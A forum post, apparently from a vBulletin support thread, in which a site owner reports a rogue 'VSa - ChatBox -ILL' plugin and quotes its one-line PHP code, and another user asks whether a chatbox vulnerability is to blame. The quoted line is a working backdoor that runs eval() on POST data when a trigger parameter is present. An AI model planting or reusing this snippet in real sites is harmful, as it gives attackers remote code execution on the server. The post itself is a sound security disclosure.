Quote:
Originally Posted by bryanie
I have a security issue related to this plugin. Today I noticed a plugin called "VSa - ChatBox -ILL" on my site, listed under product vBulletin (not the chatbox product). The plugin code was
Code:
if(isset($_GET['aimn++++'])){echo "<h1>jkrose</h1><pre>";eval($_POST[shuix]);exit;}
If I'm reading this correctly, it will allow remote PHP code execution on my server. I do not know if there is a vulnerability in the chatbox code, or if my site was targeted because I have the chatbox installed, but either way I figured you should know about it.
|
Am concerned about this, is that a chatbox vulnerability already addressed or is related to some other security flaws?